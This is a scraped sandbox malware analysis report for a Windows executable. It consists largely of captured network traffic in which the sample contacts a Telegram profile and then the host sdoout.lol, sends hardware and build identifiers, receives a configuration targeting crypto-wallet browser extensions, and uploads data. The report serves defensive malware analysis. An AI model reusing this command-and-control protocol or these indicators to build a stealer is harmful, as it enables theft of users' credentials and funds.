2024-12-31 08:46:03 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 08:46:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12299 Connection: close Set-Cookie: stel_ssid=0858ffa790ed537ffa_10782425019224275256; expires=Wed, 01 Jan 2025 08:46:03 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-31 08:46:03 UTC	12299	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:04 UTC	183	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:05 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----37q1nohlnycbieu3eu3o User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:05 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 43 34 41 43 32 43 46 34 39 33 33 31 35 38 38 32 31 30 39 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 33 37 71 31 6e 6f 68 6c 6e 79 63 62 69 65 75 33 65 75 33 6f 2d 2d 0d Data Ascii: ------37q1nohlnycbieu3eu3oContent-Disposition: form-data; name="hwid"FCC4AC2CF4933158821099-a33c7340-61ca------37q1nohlnycbieu3eu3oContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------37q1nohlnycbieu3eu3o--
2024-12-31 08:46:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:06 UTC	70	IN	Data Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 30 7c 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 7c 31 7c 31 7c 30 7c 31 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3b1\|1\|1\|0\|8d103014deb63325e02411a3be5b5033\|1\|1\|0\|1\|0\|100000\|10

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:08 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3wtr1vkf37qim7q1dtj5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:08 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 77 74 72 31 76 6b 66 33 37 71 69 6d 37 71 31 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 33 77 74 72 31 76 6b 66 33 37 71 69 6d 37 71 31 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 33 77 74 72 31 76 6b 66 33 37 71 69 6d 37 71 31 64 74 6a 35 0d 0a 43 6f 6e 74 Data Ascii: ------3wtr1vkf37qim7q1dtj5Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------3wtr1vkf37qim7q1dtj5Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------3wtr1vkf37qim7q1dtj5Cont
2024-12-31 08:46:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:09 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6684V5n83w.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\kno8y\6xlx4w

C:\ProgramData\kno8y\89hdt0

C:\ProgramData\kno8y\aieukn

C:\ProgramData\kno8y\cjwbaa

C:\ProgramData\kno8y\d26f3e

C:\ProgramData\kno8y\gd2vasr16

C:\ProgramData\kno8y\lxlxt0

C:\ProgramData\kno8y\mgd2v3

C:\ProgramData\kno8y\srq16pzmy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2ebf5b50-7f2a-45b6-a7fe-aae220f9370d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3ac0ff37-3658-4e33-992c-da7560f75c06.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4e89ff6a-b888-499b-be10-0f7222ed0c71.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\677713ba-287a-4ed9-b7df-e77e85792e5e.tmp

Windows Analysis Report
6684V5n83w.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:11 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----q1va1d2d2v3w47ymophd User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 6937 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:11 UTC	6937	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 Data Ascii: ------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------q1va1d2d2v3w47ymophdCont
2024-12-31 08:46:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:11 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:12 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----q1va1d2d2v3w47ymophd User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:12 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 71 31 76 61 31 64 32 64 32 76 33 77 34 37 79 6d 6f 70 68 64 0d 0a 43 6f 6e 74 Data Ascii: ------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------q1va1d2d2v3w47ymophdContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------q1va1d2d2v3w47ymophdCont
2024-12-31 08:46:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 08:46:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:14 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 08:46:14 UTC	1266	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:46:14 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-BL1moe5z6pCUzpUf6FLdVw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-31 08:46:14 UTC	124	IN	Data Raw: 39 64 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 69 61 6e 74 20 73 63 68 6e 61 75 7a 65 72 20 77 69 6e 73 20 64 6f 67 20 73 68 6f 77 22 2c 22 64 75 6e 65 20 70 72 6f 70 68 65 63 79 20 65 70 69 73 6f 64 65 20 37 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 69 64 61 68 6f 20 6c 6f 74 74 65 72 79 20 72 61 66 66 6c 65 22 2c 22 74 20 63 6f 72 6f 6e 61 65 20 62 6f 72 65 Data Ascii: 9d2)]}'["",["giant schnauzer wins dog show","dune prophecy episode 7 release date","idaho lottery raffle","t coronae bore
2024-12-31 08:46:14 UTC	1390	IN	Data Raw: 61 6c 69 73 20 6e 6f 76 61 22 2c 22 64 65 6e 73 65 20 66 6f 67 20 6d 61 6b 69 6e 67 20 70 65 6f 70 6c 65 20 73 69 63 6b 22 2c 22 6a 65 6f 70 61 72 64 79 20 77 69 6e 6e 65 72 20 74 6f 64 61 79 22 2c 22 77 68 61 74 73 61 70 70 20 32 30 32 35 22 2c 22 61 6e 74 68 6f 6e 79 20 73 61 6e 74 61 6e 64 65 72 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 Data Ascii: alis nova","dense fog making people sick","jeopardy winner today","whatsapp 2025","anthony santander"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:sugg
2024-12-31 08:46:14 UTC	1007	IN	Data Raw: 68 77 51 32 31 68 53 31 5a 52 61 32 74 5a 54 7a 46 33 4e 46 4a 53 64 56 68 51 53 43 39 4a 4e 45 39 4c 61 47 56 72 4d 47 31 36 56 48 68 77 54 6b 35 76 4e 6d 46 6b 52 45 68 6c 57 46 56 7a 56 6e 4e 36 5a 6a 56 46 4d 48 46 4c 63 58 6c 6e 63 6e 6c 34 4e 45 70 56 4f 55 52 51 54 6c 64 78 4d 6d 70 4e 54 6e 5a 47 52 58 70 47 62 56 4a 42 63 46 6b 72 64 55 49 7a 56 56 4d 34 56 32 31 31 53 53 39 4a 5a 45 38 78 56 46 64 4a 63 45 56 6e 64 44 4a 58 54 30 38 7a 55 57 68 75 5a 44 4a 43 56 55 38 76 54 30 38 79 4e 45 45 76 63 58 4a 57 53 47 56 58 4f 47 68 33 63 33 46 6f 64 58 52 79 59 30 64 31 59 32 52 4d 4d 57 39 69 62 46 4e 69 59 56 64 49 5a 57 6c 70 61 58 52 43 61 30 4e 7a 5a 44 56 51 53 6d 74 34 64 30 31 47 55 48 45 79 54 33 45 79 56 58 4a 74 59 6d 46 79 55 30 68 75 63 Data Ascii: hwQ21hS1ZRa2tZTzF3NFJSdVhQSC9JNE9LaGVrMG16VHhwTk5vNmFkREhlWFVzVnN6ZjVFMHFLcXlncnl4NEpVOURQTldxMmpNTnZGRXpGbVJBcFkrdUIzVVM4V211SS9JZE8xVFdJcEVndDJXT08zUWhuZDJCVU8vT08yNEEvcXJWSGVXOGh3c3FodXRyY0d1Y2RMMW9ibFNiYVdIZWlpaXRCa0NzZDVQSmt4d01GUHEyT3EyVXJtYmFyU0huc
2024-12-31 08:46:14 UTC	179	IN	Data Raw: 61 64 0d 0a 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 5d 7d 5d 0d 0a Data Ascii: ad3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY"]}]
2024-12-31 08:46:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:15 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 08:46:15 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Tue, 31 Dec 2024 08:46:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-31 08:46:15 UTC	372	IN	Data Raw: 31 61 33 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1a31)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
